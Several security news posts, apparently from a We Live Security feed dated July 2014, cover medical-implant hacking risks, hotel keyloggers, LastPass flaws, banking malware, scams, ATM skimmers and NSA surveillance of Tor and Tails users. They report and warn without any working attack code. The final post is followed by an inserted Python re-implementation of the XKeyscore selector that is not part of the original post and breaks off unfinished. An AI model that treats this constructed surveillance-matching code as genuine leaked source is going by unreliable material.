According to CNET, MicroCHIPs has developed a tiny chip that can be implanted under a woman’s skin to manage her birth control for up to 16 years.

The chip, which measures just 20 x 20 x 7 millimetres, contains tiny reservoirs – filled with birth control drugs.

MicroCHIPs’ technology is based on proprietary reservoir arrays that are used to store and protect potent drugs within the body for long periods of time. These arrays are designed for compatibility with preprogrammed microprocessors, wireless telemetry, or sensor feedback loops to provide active control. Individual device reservoirs can be opened on demand or on a predetermined schedule to precisely control drug release or sensor activation.

Sounds clever doesn’t it?

And, guess what? You can control the chip wirelessly via a remote control.

So, you had better hope that someone malicious can’t subvert the security in the chip’s wireless communications.

After all, if they are able to control the drug’s release on demand they could potentially either stop the contraception entirely (increasing the chances of pregnancy) or flood the woman’s body with massively higher levels of the drug that could cause illness.


So, would you trust the technology to manage your or your wife’s fertility? Or would you be concerned about (ahem) unauthorised penetration?

It’s not as though security researchers and hackers haven’t shown they can take control of how much insulin is pumped through a patient’s body, or that a former vice-president of the United States wasn’t so frightened of assassination that he had the wireless feature of his implanted heart defibrillator deactivated.

In an interview with Mashable, Robert Farra of MicroCHIPS attempts to reassure the public that the devices are being made with security in mind:

A hacker would have to contact the patient’s skin to reach the device, and all the commands are sent by radio frequency rather than by Bluetooth. The short range also makes it impossible for a hacker to “listen in,” Farra says.

The chip has a micro-clock that remembers when the last 30-day reservoir was opened. Even if that failed, the chip’s battery is not strong enough to melt all the seals at once and release all the reservoirs at the same time.

Farra also says chips will not break in an accident and release drugs because they are strong enough to resist hundreds of pounds of pressure per square inch. They will be implanted in soft parts of the body that offer cushioning, he adds.

Car manufacturers spend millions ensuring that their vehicles are safe to drive, as they know that they would be hit by huge consequences if they had an endemic safety problem. Similarly, there are bodies who keep a close eye on our utility systems to make sure that they are not poisoning us, and hoops that manufacturers must jump through before they can put electrical devices onto the market.

Let us all hope that medical device manufacturers are taking their responsibility to our safety seriously, and teaming up with cybersecurity experts to ensure that their wireless devices are protected from malicious hackers.

Time will tell if MicroCHIPs’ safety measures will have been sufficient or not. If they’re not, what’s the betting that someone will drily condemn their offspring with a telling name.

Chip, perhaps?

Android L Security http://www.welivesecurity.com/podcasts/android-l-security/ http://www.welivesecurity.com/podcasts/android-l-security/#comments Mon, 14 Jul 2014 15:10:17 +0000 Android L Security http://www.welivesecurity.com/?post_type=post_podcast&p=47857 The post Android L Security appeared first on We Live Security.

Keylogger malware in hotel business centers – should you worry? http://www.welivesecurity.com/2014/07/14/keylogger-malware/ Mon, 14 Jul 2014 14:41:06 +0000

Guests who used business centers in American hotels may be at risk from gangs installing keylogger malware on the computers to steal banking and email passwords, according to a report by veteran security writer Brian Krebs.

The Department of Homeland Security and National Cybersecurity and Communications Integration Center (NCCIC) issued an advisory to hotel companies on July 10, warning that criminal groups may be targeting hotel business centers with keylogger malware, according to Help Net Security.

“In some cases, the suspects used stolen credit cards to register as guests of the hotels; the actors would then access publicly available computers in the hotel business center, log into their Gmail accounts and execute malicious key logging software,” the NCCIC said in its advisory.

Keylogger malware warning

Despite describing the attacks as “not sophisticated”, the attackers’ keylogger malware had a high impact, the NCCIC warns: “The suspects were able to obtain large amounts of information including other guests’ personally identifiable information (PII), log in credentials to bank, retirement and personal webmail accounts, as well as other sensitive data flowing through the business center’s computers.”

The warning follows the arrest of suspects in Texas who had used keylogger malware to record the keystrokes of guests, and had successfully stolen details such as bank account passwords and email login credentials at several “major” hotel chains.

How to stay safe from keylogger malware

The advisory included steps for hotel chains to secure PCs in their business centers – including limiting guests to non-administrator accounts without the ability to install programs.

Help Net Security points out that much modern malware can install regardless of whether a user has administrator privileges – and advises hotel guests to refrain from entering sensitive information such as banking passwords whilst on PCs in hotel business centers.

Krebs points out that the fact that hotel business centers routinely allow users to plug in USB devices and CDs means that attackers can bypass many security measures.

Security Affairs offers a detailed list of the NCCIC’s recommendations for hotel chains – but concludes that the simplest solution is to avoid using any public computer for private affairs such as banking, warning “Cybercriminals are behind you.”

The post Keylogger malware in hotel business centers – should you worry? appeared first on We Live Security.

Retina scanner for Samsung Galaxy Note 4? http://www.welivesecurity.com/2014/07/14/samsung-galaxy-note-4/ Mon, 14 Jul 2014 13:52:58 +0000

A Tweet from an official Samsung Galaxy Note 4 account has dropped a very unsubtle hint that its upcoming Galaxy Note 4 handheld may be the first device from the company to feature a retina scanner – offering a significantly higher level of password security than the fingerprint scanners on Samsung’s current flagships, such as the Galaxy S5, and on Apple’s rival iPhone 5S.

A Tweet from Samsung’s official Exynos account (the high-end processor expected to appear in the upcoming Galaxy Note 4 phablet) said, “Security can be improved using features unique to us. That’s what we envision. What would you use?” The Tweet was accompanied by an image of an eye on the screen of a large smartphone/tablet.

Trusted Reviews notes that the Tweet also includes the words “Unlock the Future” and comments “if [this] isn’t an allusion to retina device unlocking we’ll eat our hats.”

Samsung Galaxy Note 4 – due in weeks?

Samsung executives have said that retina scans would be used in upcoming, high-end smartphones. International Business Times notes that the Samsung Galaxy Note 4 – a high-end, large-screen gadget aimed at workers on the move – is expected to launch at an event at Berlin’s IFA conference in early September.

Samsung used the conference to launch the predecessors to its Galaxy Note 4 handset, alongside paired devices such as the Galaxy Gear smartwatch.

Samsung executives have previously said in interview that the company is investigating new biometric technologies for use in high-end smartphones – including retina scans, which offer a higher level of security than current fingerprint scanners. Fingerprint scanners (used in current smartphones such as the Galaxy S5) have a high level of false positives, and are also possible to fool with fake fingerprints.

Galaxy Note 4 – security pioneer?

“We’re looking at various types of biometrics and one of the things that everybody is looking at is iris detection,” Rhee said. He said that the technology would appear in high-end smartphones first – just as fingerprint scans appeared in Apple’s iPhone 5S and Samsung’s Galaxy S5. Samsung is riding the current wave of enthusiasm for biometrics.

“We, as a market leader, are following the market trend,” he said.

The Register points out that iris scanners offer a higher level of security than fingerprint scans – both the Galaxy S5 and iPhone 5S were ‘hacked’ within days of launch. “The trouble is, they’re not terribly secure – at least, not by the standards of government work. Hackers demonstrated a way to fool the Galaxy S5’s fingerprint scanner using a fake fingerprint made of wood glue four days after the phone launched,” the site commented.

Iris scans are used in high-security government institutions as they generally work faster than fingerprint scans, and offer higher accuracy by scanning for more data points.

At CES this year, a sensor designed for use in smartphones, Myris, boasted that it could best the levels of security offered by fingerprint scans, analyzing frames of video for unique identifiers at a speed comparable to “looking in a mirror”. The device required a mouse-sized dongle to operate – but offered, its makers claimed, a “false positive” rate of 2.25 trillion, equivalent to the population of 315 Earths.

Anthony Antolino of Myris said, “Iris, as a human part of the body, is second only to DNA in terms of its ability to authenticate someone with certainty. No two people on the planet have the same iris texture. Not even identical twins.”

The post Retina scanner for Samsung Galaxy Note 4? appeared first on We Live Security.

LastPass security holes found by researcher, says password management firm – but no need to panic http://www.welivesecurity.com/2014/07/12/lastpass-security-holes-found-researcher-says-password-management-firm-need-panic/ Sat, 12 Jul 2014 16:43:22 +0000

LastPass has gone public about a couple of security holes that were found in its popular online password management software.

That’s enough to send a shiver down the spines of the many internet users who trust the service to store their passwords securely, but the company says that there is no need to panic.

In a blog post entitled “A note from LastPass”, the company has given brief details of the flaws found in its password manager for Chrome, Firefox, Opera and Safari.

(By the way, do you feel as cynical as me about how some vendors reporting security vulnerabilities in their products love to downplay the seriousness by not referring to any words like “security” or “vulnerability” in the headlines of their advisories?)

Bookmarklet vulnerability

The first vulnerability isn’t really in the main LastPass product at all, but instead in an add-on known as Bookmarklets.

LastPass Bookmarklets are small snippets of JavaScript code that install as a bookmark or “favourite” in your browser.

Chances are that you would only be using Bookmarklets if you wish to integrate LastPass more tightly with the mobile Safari browser on iOS, or if you weren’t using one of the major browsers that LastPass officially supports.

If you click on a Bookmarklet, you can execute code on the webpage that you’re viewing. That could, of course, be useful if there is a login form on the webpage and no other easy way to access your password manager, but what happens if the webpage you are running the code on is itself malicious?

Zhiwei Li, a security researcher at UC Berkeley, found a method by which (if a user clicked a bookmarklet while visiting an untrustworthy website) passwords for other sites could be extracted from LastPass and put in the hands of criminal hackers.

A research paper by Zhiwei depicts an untrustworthy site tricking a Bookmarklet into revealing the user’s Dropbox password – although this could actually be repeated to extract every password stored in a victim’s LastPass vault.

Bookmarklet vulnerability

LastPass says that Bookmarklets are “actively used by less than 1% of the user base”, and is keen to underline that the threat is small, and that it has seen no evidence of malicious exploitation:

“If you are concerned that you’ve used bookmarklets before September 2013 on non-trustworthy sites, you may consider changing your master password and generating new passwords, though we don’t think it is necessary.”

One Time Password (OTP) vulnerability

In this targeted attack, Zhiwei showed that it might be possible to exploit LastPass’s One Time Password (OTP) feature – normally used when a user is logging into their LastPass vault on a computer that they do not trust (such as one that is shared with other users), and that might be harbouring keylogging spyware.

OTPs self-destruct after one use, so even if a malicious hacker grabs the one you use to access your passwords – it shouldn’t be any use to them.

However, Zhiwei demonstrated that if an attacker knew their victim’s LastPass username they could exploit the feature to extract a directory of all the sites for which the user was storing passwords in LastPass. Fortunately, it wouldn’t give hackers access to a user’s actual passwords, but it would allow them to make off with an encrypted copy of the password database and allow them to delete credentials stored in the database.

“Regarding the OTP attack, it is a ‘targeted attack’, requiring an attacker to know the user’s username to potentially exploit it, and serve that custom attack per user, activity which we have not seen. Even if this was exploited, the attacker would still not have the key to decrypt user data. If you’d like to check your current OTPs you can do so here.”

The good news is that the people who found the security vulnerabilities were Zhiwei and his fellow researchers at UC Berkeley, rather than a cybercriminal. Zhiwei is said to have acted responsibly with the information, and – according to LastPass’s statement – the company “doesn’t have any evidence they were exploited by anyone beyond [Zhiwei] and his research team.”

What strikes me as a little unusual about the disclosure of these vulnerabilities is that they were first reported (and indeed patched) back in the fall of last year. It has taken almost a year for them to become public.

LastPass says that Zhiwei only tested the exploits on dummy LastPass accounts, and because it found no evidence of malicious exploitation, and addressed the issues immediately, the company refrained from discussing the research until after it had been published.

All LastPass users should be grateful that the company addressed the security vulnerabilities so quickly, and feel reassured that there is no evidence that anyone’s password vaults were compromised.

Although flaws and issues are found from time to time with password managers, as detailed in Zhiwei’s research, which looks at other password management products besides LastPass, I remain a strong believer that, for the typical computer user, decent password management software is a more secure way to live online than relying on memory and common sense to generate passwords and keep them secure.

Get yourself a password manager, choose a strong, hard-to-crack master password, enable two-factor authentication and start taking your online privacy more seriously.

What do you think? Do you trust password management software? Or do you prefer to manage your passwords in a different way? Let us know your opinion by leaving a comment below.

The post LastPass security holes found by researcher, says password management firm – but no need to panic appeared first on We Live Security.

Banking malware Shylock’s servers knocked out by law enforcement http://www.welivesecurity.com/2014/07/11/shylock-banking-malware/ Fri, 11 Jul 2014 15:31:07 +0000

A notorious strain of banking malware, known as Caphaw – or Shylock, due to snippets of Shakespeare’s Merchant of Venice embedded in its code – has seen its command and control servers shut down in a major international police operation involving law enforcement from eight countries.

The British National Crime Agency (NCA) claims that the malware infected 10,000 PCs in Britain alone, and 30,000 worldwide, with victims in America among other countries.

ESET has tracked the banking malware since 2011, and ESET researchers have followed it closely since February 2013. In a detailed blog post, ESET researchers write, “Win32/Caphaw is an interesting financial malware family: one of the few that has autoload functionality for automatically stealing money when the user is actively accessing his banking account. An infected user can’t recognize that his money is being stolen, because he sees fake data on the banking web page based on the webinjects’ rules. (Autoloads bypass one-time password security checks.)”

Banking malware hits 30,000 users

ESET’s Virus Radar shows territories most affected by the banking malware. Britain’s NCA said in a statement that while the gang behind it is not thought to be British, the banking malware appeared to target British banks in particular, hence the NCA coordinated an international effort from the European Cybercrime Centre at Europol in the Hague.

“Victims are typically infected by clicking on malicious links, and then being convinced to download and run the malware. Shylock will then seek to access funds held in business or personal accounts, and transfer them to the criminal controllers,” the NCA said.

“The NCA is co-ordinating an international response to a cybercrime threat to businesses and individuals around the world,” Andy Archibald, deputy director at the NCA’s National Cyber Crime Unit, said in an interview with The Guardian.

“This phase of activity is intended to have a significant effect on the Shylock infrastructure and demonstrates how we are using partnerships across sectors and across national boundaries to cut cybercrime impacting the UK.”

Shylock banking malware – what to do

The NCA advises users worried about the banking malware to ensure their security software is up to date.

It says in a statement, “The latest operating system update will result in the removal of Shylock infections in machines which have been set to automatically update Windows.

Computer users opting for automated operating system updates – which can ensure computers infected with malware such as Shylock are cleaned automatically – need take no action at this time. Those not opting for automatic updates, or who would like to learn more about how to check their Windows-operated computers and remove infection, can go to: http://support.microsoft.com/gp/cu_sc_virsec_master.”

ESET offers tips on how to spot and avoid banking malware and scams alongside the latest updated banking malware news from ESET researchers.

The post Banking malware Shylock’s servers knocked out by law enforcement appeared first on We Live Security.

Google Drive privacy warning – could yours have leaked data? http://www.welivesecurity.com/2014/07/11/google-drive-privacy-warning/ Fri, 11 Jul 2014 14:37:05 +0000

Shared files sent via Google Drive could have shared more than their senders intended, Google admitted this week – in a Google Drive privacy post where the internet giant admitted that certain file types could be visible to people other than their intended recipients.

Google recently updated Drive with tools to make it more appealing for business, but the storage system is already commonly used in business to share and edit files. Google has issued detailed instructions for Google Drive users who fear they may have shared confidential information.

Google has patched the Google Drive privacy problem, and issued detailed instructions on what file types are affected (files created in other programs and stored unconverted in Google Drive, and shared with ‘anyone who has the link’).

Infoworld says, “Google’s handling of the matter is further evidence that the company has a good nose for how to deal with such exploits. But here’s also hoping Google applies the lessons from this discovery to all its services.”

Google Drive privacy – who can read my files?

Veteran security researcher and We Live Security contributor Graham Cluley, writing on the Intralinks blog, says that the leak, “underlines the unexpected dangers which can arise from allowing “anyone who has the link” to access your private data without further authentication.”

Google’s Drive privacy post explains which files may be at risk – yours are only at risk if they fulfill ALL of the following conditions:

  1. The file has to have been uploaded to Google Drive, and shared with ‘anyone who has the link’
  2. It has to have remained in its original format (i.e. .docx), without being converted to Google Drive formats such as Docs
  3. It has to have contained links to third-party HTTPS websites

If this is the case, admins on the third-party website may have been able to see a URL which allowed them to click through to sensitive data.

Cluley points out that in certain business scenarios – such as corporate takeover bids – this could plausibly have resulted in the target of such a bid being able to read the details freely online.

What to do if you’re worried about Google Drive privacy

Google has patched the issue – so that any documents shared via the service going forward will no longer be affected by the privacy problem.

This, however, does not affect documents that have already been shared via the service. Google Technical Program Manager Kevin Stadmeyer advises, “If one of your previously shared documents meets all four of the criteria above, you can generate a new sharing link with the following steps:

  1. Create a copy of the document, via File > “Make a copy…”
  2. Share the copy of the document with particular people or via a new shareable link, via the “Share” button
  3. Delete the original document.”

In its guide to using Google Drive privately, the company advises users to make sure that documents are shared correctly – i.e. users should think carefully about whether ‘anyone who has the link’ is an appropriate setting for a confidential file…

The post Google Drive privacy warning – could yours have leaked data? appeared first on We Live Security.

Copyright emails ‘poisoned with Trojan’ http://www.welivesecurity.com/2014/07/10/copyright-email-poisoned-with-trojan/ Thu, 10 Jul 2014 16:41:00 +0000

Emails warning internet users that they have violated copyright and owe companies such as Sony and Paramount a cash settlement have been circulating widely in Germany – but these copyright emails are a scam, bait to make victims click on a Trojan attached to the emails.

Duped by copyright email

The copyright emails accuse their recipients of having pirated tracks by artists such as Jay-Z, Bullet for my Valentine, James Blunt and heavy metal bands such as Sepultura.

Torrentfreak reports that up to 30,000 web users in Germany have received the copyright emails – and that “middle man” companies such as Rightscorp do send such demands via email, so victims are more likely to be duped into opening the poisoned attachment.

‘Fastest possible payment’

One of the copyright email messages says, “This is a warning because of your violation of § 19a of the Copyright Act on 07.06.2014. The music album ‘Bullet For My Valentine – Temper Temper’ was downloaded from your IP address 8.149.94.13 at 3:40:24. Only the fastest possible payment of a fine of 400.88 euros can prevent this. We expect payment within the next 48 hours.”

“For details see the attached document”

Thousands targeted

Cologne copyright lawyer Christian Solmecke said that he saw hundreds of emails in one morning this week – saying that the pattern of the attack was similar to a fake copyright violation phishing campaign which targeted users of the pornographic site RedTube.

“On Monday morning more than 100 people have called us in the office,” Solmecke writes on his blog. “We think that the fake warnings have reached 10,000 people today.”

The Next Web reports that some of the emails appear to arrive from genuine law firms involved in sending out copyright notices.

Solmecke offers guidelines on how to spot the fraudulent emails (German-language link): he says that the zip file attachment is a giveaway, as no reputable law firm would send a copyright demand in that format, as is the 48-hour deadline users are given to pay the fine.

The post Copyright emails ‘poisoned with Trojan’ appeared first on We Live Security.

Nigerian scams expand to Malaysia – fraud doubles http://www.welivesecurity.com/2014/07/10/nigerian-scams-expand-to-malaysia/ Thu, 10 Jul 2014 14:41:05 +0000

Nigeria’s notorious scam industry has expanded overseas – with Nigerian conmen entering Malaysia on student visas to perpetrate fraud using the country’s fast connections and advanced banking system, and raking in millions of dollars.

Nigerian scams target U.S. women

Reuters reports that American women are being ensnared via dating websites, with scammers targeting older, lonely women and swindling them out of life savings. Some victims have lost up to $250,000.

Officials at the U.S. consulate say that complaints about such scams now make up 80% of inquiries to duty officers in Kuala Lumpur, according to Time’s report.

NDTV reports that Malaysian police issued statements in December 2013, claiming that internet fraud had doubled in 2013, with losses over $11 million. Local police claimed to have apprehended 478 Africans on suspicion of involvement in such scams.

One case earlier this year saw five African men in an alleged internet scam arrested in Malaysia’s Klang Valley, along with local accomplices who provided them with bank accounts.

Local news outlet The Star reported that police seized 14 bank account books, 21 ATM cards, 10 handphones and several other items.

“Our initial investigations revealed that all five of the Nigerian suspects were in Malaysia on student visas,” a police official told a press conference.

Lack of resources?

U.S. officials, speaking to Reuters, claim that Malaysian police lack the resources to deal with the broader problem, and that no case involving a U.S. victim has yet been successfully prosecuted.

“These are not rich widows who are being preyed on, these are middle-class Americans who don’t have this kind of money to spare,” Tim Scherer, U.S. consul general, said. “It can really transform their lives in a very terrible way.”

The post Nigerian scams expand to Malaysia – fraud doubles appeared first on We Live Security.

How to remove your house from Google Street View http://www.welivesecurity.com/2014/07/10/remove-house-google-street-view/ Thu, 10 Jul 2014 14:10:27 +0000

Former British Prime Minister Tony Blair, septuagenarian former mop-top Sir Paul McCartney and disgraced former RBS banker Fred Goodwin are just some of the public figures who are said to have successfully convinced Google to change Street View pictures of their homes into a bunch of blurred pixels.

But what are you supposed to do if you’re not a political statesman, a crinkly crooner or an executive who oversaw the largest annual loss (£24.1 billion) in UK corporate history?

How are YOU supposed to remove your house from Google Street View if you don’t like the idea that Google drove one of its Street Cars up your road, took a photo of your front door without your permission, and then published it on the net?

Well, fortunately there is a way. And it should work not only if you are trying to remove your house from Google Street View, but also if you want the search giant to blur out a face, a vehicle or another object.

1. Firstly, locate your address on maps.google.com. You do this simply by typing the address into the search box and pressing enter.

There should be a red pin-tack shown on the screen representing your home on the map.

You now need to make sure you are in Street View mode. You can do that by finding the Street View icon (represented by a stick man) in the lower right hand corner of the screen, and clicking on the map.

Google Street View icon

2. Use the left and right arrow controls with your mouse to adjust the Google Maps Street View, until you get a clear view of your house.

Once you’re happy the view represents your house, click on the “Report a Problem” link in the bottom right-hand corner of the screen.

Report a problem

You’re almost done. A new webpage is displayed, showing a street view of what Google believes you wish to raise a concern about. This is your final opportunity to adjust the view.

Report Google Street View

3. At this point you can tell Google what you wish to be blurred – a face, your home, a car or license plate, or a different object – and explain the area of concern.

Google will ask you for a contact email address and requests that you complete a CAPTCHA to verify that you are a human rather than a bot developed by privacy campaigners trying to sabotage Google Street View.

Click the Submit button.

Thanks Google, for considering blurring a picture of my house

4. You have done it. Now you just have to wait and see.

Tony Blair, or presumably one of his staff, went through the process and has successfully excised the image of his Georgian home in London.

Tony Blair's house in London

Will you be as successful as Tony Blair at getting a photo of the front of your house obscured from Google Street View? You can only hope that Google will honour your right to privacy.

At the time of writing my own front door is still visible on Street View, a week after I first requested its pixellation.

Of course, there are other solutions if you don’t like Google Street View showing the world a picture of your house.

For instance, Google CEO Eric Schmidt glibly told those who were concerned to “just move” if they didn’t like Google having a street view picture of their home.

Hardly a practical solution, I’m sure you would agree. Schmidt later claimed that he “misspoke” by making that remark – but I wondered if he had taken the advice himself.

After all, according to Forbes, Google CEO Eric Schmidt recently purchased a $22 million mansion in the Holmby Hills neighbourhood of Los Angeles, within spitting distance of Hugh Hefner’s Playboy mansion.

Eric Schmidt's home

As you can see – he doesn’t appear to have blurred out Google Street View images of his home. Mind you, it’s not as if you can actually see his home from the road.

Schmidt, you will remember, was the guy who back in October 2010 made the hairs stand up on the back of privacy-conscious internet users’ necks when he declared:

“Google policy is to get right up to the creepy line and not cross it”

Oh well, that’s reassuring…

The post How to remove your house from Google Street View appeared first on We Live Security.

New ‘slimline’ ATM skimmers are near-invisible http://www.welivesecurity.com/2014/07/10/new-slimline-atm-skimmers-near-invisible/ http://www.welivesecurity.com/2014/07/10/new-slimline-atm-skimmers-near-invisible/#comments Thu, 10 Jul 2014 12:39:58 +0000 New ‘slimline’ ATM skimmers are near-invisible http://www.welivesecurity.com/?p=47563 New ‘slimline’ ATM skimmers are proving far harder to spot - with some of the hi-tech models remaining in place for up to five days before banks are alerted, and equipped with hi-tech extras such as cameras to spy on users' PIN codes.

The post New ‘slimline’ ATM skimmers are near-invisible appeared first on We Live Security.

New ‘slimline’ ATM skimmers are proving far harder to spot – with some of the hi-tech models remaining in place for up to five days before banks are alerted, according to a report released by a European ATM security group.

The report is based on crime updates from 19 countries in Europe – and highlights a technological arms race which has seen card fraud migrate to areas such as the U.S.

In four European countries, criminal gangs are using malicious software to overwhelm ATMs – and one European country has seen machines uprooted and their internal workings removed and rebuilt by criminals before being replaced. These machines are known as “ghost terminals.”

Ghost terminals

Red Orbit reports that some hi-tech models of ATM skimmer even come with a tiny concealed camera which monitors button-presses on the PIN keypad, so the device can steal card data and PIN numbers at once.

Veteran security reporter Brian Krebs dissected some of the latest ATM skimmers on his blog, Krebs on Security – noting that as well as cameras and housings made of stealthy translucent plastic, the devices often came with mobile phone parts attached to transmit the data from the ATM instantly.

“New versions of insert ATM skimmers (ATM skimmers placed inside the card reader throat) are getting harder to detect,” the European ATM Security Team revealed in its second European Fraud Update for 2014.

ATM Skimmers equipped with cameras and transmitters

Four countries reported the use of malware to compromise payment terminals – but overall, the EAST group reported that fraud monitoring and detection continued to be effective in Europe.

The group said, “European fraud counter-measures such as Geo-blocking, fraud monitoring capabilities and fraud detection continue to improve and most ATM related card skimming losses occur outside Europe and are migrating away from EMV Chip liability shift areas.”

Losses are now concentrating in other territories outside Europe – with the USA the top location for such attacks, followed by Thailand and Indonesia.

ESET Senior Research Fellow David Harley offers a detailed commentary on some of the technological issues underlying card fraud, particularly in America, in a We Live Security blog post this month.

‘Malaysia Airlines flight MH370 found’ Facebook hoax
http://www.welivesecurity.com/2014/07/09/flight-mh370-found-hoax/
Wed, 09 Jul 2014 11:13:45 +0000

A link showing the nose of an airliner jutting above the waves, with the headline, ‘Malaysian Air Flight MH370 found by sailor’ has been circulating on Facebook this week, according to a report by Hoax-Slayer – but the link is a new scam.

The post ‘Malaysia Airlines flight MH370 found’ Facebook hoax appeared first on We Live Security.

A link showing the nose of an airliner jutting above the waves, with the headline, ‘Malaysian Air Flight MH370 found by sailor’ has been circulating on Facebook this week, according to a report by Hoax-Slayer – but the link is another scam designed to lure victims to complete surveys.

The new ‘video’ has surfaced just as Malaysia announced it was stepping up its search for the missing airliner in the Indian Ocean, as reported by the South China Morning Post. Cybercriminals often time scams to coincide with the global news cycle – we’ve created a We Live Security guide to spotting these scams.

In this latest piece of ‘breaking news’, there is no video, and the entire news story is a fake: a new spin on a scam which blighted Facebook when the airliner first went missing four months ago.

‘MH370 found’

The message reads, “Malaysian Air Flight MH370 Found By Sailor Moments Ago: Mystery Solved – Sailor Awarded $5 Million on spot,” with a video underneath, showing the nose of a plane.

As with previous Facebook scams regarding the missing flight, the criminals have simply substituted an image of another plane crash – in this case, US Airways Flight 1549, which crashed in January 2009, plunging into New York’s Hudson River (without loss of life).

The link is equally false: in an echo of previous scams, users are urged to complete survey after survey, which earns the link’s creators money via affiliate marketing schemes. Some of the surveys attached to this particular scam ask for a mobile phone number – anyone who provides this information is immediately signed up for costly SMS services.

Hoax-Slayer says: “The scammers who create these fake video posts earn money via dodgy affiliate marketing schemes each and every time that a user participates in a survey. And, by tricking people into sharing the scam posts, they can greatly increase the number of potential victims.”

Endless surveys – and no video

“Some of the ‘survey’ pages ask you to provide your mobile phone number, an act that actually subscribes you to a very expensive text messaging service. Others may ask you to provide personal information including your name, address and contact details.”

Hoax-Slayer warns against clicking on any suspicious link purporting to carry ‘breaking news’.

Read ESET experts’ tips on how to spot such posts.

Could latest NSA revelations further impact online behavior, denting the economy?
http://www.welivesecurity.com/2014/07/08/nsa-revelations-tor-linux-90-percent/
Tue, 08 Jul 2014 16:10:15 +0000

Internet surveillance by America's National Security Agency (NSA) has been further exposed by two new developments: the analysis of leaked NSA surveillance reports and the XKeyscore targeting code. Will these stories increase the number of Internet users who say they are inclined to reduce their online engagement due to the activities of the NSA and GCHQ?

The post Could latest NSA revelations further impact online behavior, denting the economy? appeared first on We Live Security.

Widespread Internet surveillance by America’s National Security Agency (NSA) has been further exposed by two new developments: the analysis of leaked NSA surveillance reports published by the Washington Post and the analysis of XKeyscore targeting code published by German public television. Coverage of these stories is unlikely to reassure the growing number of Internet users who say they are inclined to reduce their online engagement due to the activities of the NSA.

Reducing and/or modifying Internet activity in the wake of the NSA revelations instigated by Edward Snowden is a phenomenon we have documented on several occasions on We Live Security. In the Harris poll that we commissioned and earlier studies, we found that as many as 46% of people who were aware of the Snowden/NSA revelations had changed their online behavior in response to mass online surveillance. About a quarter of “NSA aware” people had reduced their online shopping and banking, as well as their use of email. I discussed these issues in a couple of podcasts, here and here.

That poll was conducted in February, and a lot of consumer-facing companies were probably hoping that this “Snowden effect” of online disengagement would wane in the ensuing months. However, in my opinion, the latest revelations are going to reinforce or sustain this trend.

The 90% Factor

Headlines like “90% of People the NSA Spies on Are Not Real Target” are not going to reassure anyone who has doubts about their online privacy. As the communication breakdown chart in the Washington Post indicates, 89% of accounts for which data was collected and stored belonged to “bystanders or non-targets”. And a lot of this data was personal communication, such as instant messages, emails, stored documents, Internet relay chats (IRC), social network messages (like Facebook status updates), and even real-time voice and video (such as Skype).

I think the Post does a good job of pointing out that there was also valuable anti-terrorist information within the sample of data they analyzed (data leaked to them by Edward Snowden). In fact, a majority of people we surveyed earlier this year thought surveillance was effective: 57% of Americans familiar with the NSA revelations believe that the government mass surveillance at the scale revealed by former CIA contractor Edward Snowden helps prevent terrorism. However, 43% disagreed, and in that same survey over 80% said there should be new laws implemented to better regulate government surveillance. In other words, the majority opinion seems to be that some surveillance is acceptable but it really needs to be better controlled.

Even as the latest up-tick in violence in the Middle East has raised concerns about terrorist threats, which might cause more people to support surveillance, the fact that the U.S. government appears to have been taken by surprise by the emergence of ISIS may lead more people to question how the country spends its intelligence budget (which is somewhere in excess of $50 billion).

Are You Tor-curious?

While the general public may be dismayed at reading Washington Post findings, one specific online constituency is outright upset. I’m talking about people who use and/or promote the Tor network. Named for The Onion Router, Tor is free software that enables a network of virtual tunnels that allows people and groups to improve their privacy and security on the Internet (but don’t Google Tor or visit the website just yet). The fact that America’s NSA and the UK’s GCHQ have been trying to defeat Tor was documented last year in The Guardian:

“The National Security Agency has made repeated attempts to develop attacks against people using Tor, a popular tool designed to protect online anonymity, despite the fact the software is primarily funded and promoted by the US government itself.”

I know it sounds a bit crazy, but read on, because what is newly revealed — in the analysis of programming code used by the NSA in its XKeyscore program — might sound even wilder:

“Merely searching the web for the privacy-enhancing software tools outlined in the XKeyscore rules causes the NSA to mark and track the IP address of the person doing the search.”

That’s according to German public broadcaster Norddeutscher Rundfunk, which actually published excerpts of the code. In other words, NSA may well track your IP address if you visit the Tor website (you were warned). Bear in mind that the site gets around 130,000 unique visitors a month (per compete.com). Presumably, the NSA has plenty of storage space and processing capacity to track all of those addresses, which may include several of mine, since I have gone to that site numerous times. And here’s what is both weird and infuriating about this NSA activity: only a very, very small percentage of the people who visit torproject.org are legitimate espionage targets.

(If you’ve forgotten what role Xkeyscore plays in the NSA’s Internet surveillance operations, here’s what Edward Snowden said you can do with it: “You could read anyone’s email in the world, anybody you’ve got an email address for. Any website: You can watch traffic to and from it. Any computer that an individual sits at: You can watch it. Any laptop that you’re tracking: you can follow it as it moves from place to place throughout the world. It’s a one-stop-shop for access to the NSA’s information.” From a TV interview with Norddeutscher Rundfunk.)

The Linux Extremists

If you think that tracking people who merely express an interest in Tor is extreme, then maybe you’re one of those “Linux Extremists”. You might think headlines like “NSA targets Linux Journal as ‘extremist forum‘” are an exaggeration, but the reality is right there in the code of the NSA’s XKeyscore program, part of an attempt to spy on people who might be interested in, or trying to use — warning, think before you click — The Amnesic Incognito Live System. Just take a look:

// START_DEFINITION
/*
These variables define terms and websites relating to the TAILs (The Amnesic
Incognito Live System) software program, a comsec mechanism advocated by
extremists on extremist forums.
*/
$TAILS_terms=word('tails' or 'Amnesiac Incognito Live System') and word('linux'
or ' USB ' or ' CD ' or 'secure desktop' or ' IRC ' or 'truecrypt' or ' tor ');
$TAILS_websites=('tails.boum.org/') or ('linuxjournal.com/content/linux*');
// END_DEFINITION

That’s code defining one of the categories you can target with Xkeyscore. No wonder as many as 9 out of 10 people in the surveillance data sampled by the Washington Post were “bystanders.”
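As an added example (not from the post, and not the leaked XKeyscore source), the following Python re-implements the logic of the quoted rule and runs it over constructed sample searches and page visits, going slightly beyond the text by showing how everyday queries trip the selector. The page does not document how word() matches or what the trailing '*' means, so the semantics used here are assumptions, stated in the header comment.

```python
"""Toy re-implementation of the quoted $TAILS_terms / $TAILS_websites rule.

ASSUMPTIONS (XKeyscore's matching semantics are not documented on the page):
  * word(...) is a case-insensitive substring match against the text padded
    with one space on each side, so terms quoted with surrounding spaces
    (' USB ') behave as whole-word matches while bare terms ('tails') do not.
  * The trailing '*' in a website pattern is a wildcard, and a pattern may
    match anywhere in the URL's host+path.
All sample searches and URLs below are constructed for illustration.
"""
import re
from typing import List

# Terms copied from the quoted rule (including its 'Amnesiac' spelling).
TAILS_GROUP_A = ["tails", "Amnesiac Incognito Live System"]
TAILS_GROUP_B = ["linux", " USB ", " CD ", "secure desktop", " IRC ", "truecrypt", " tor "]
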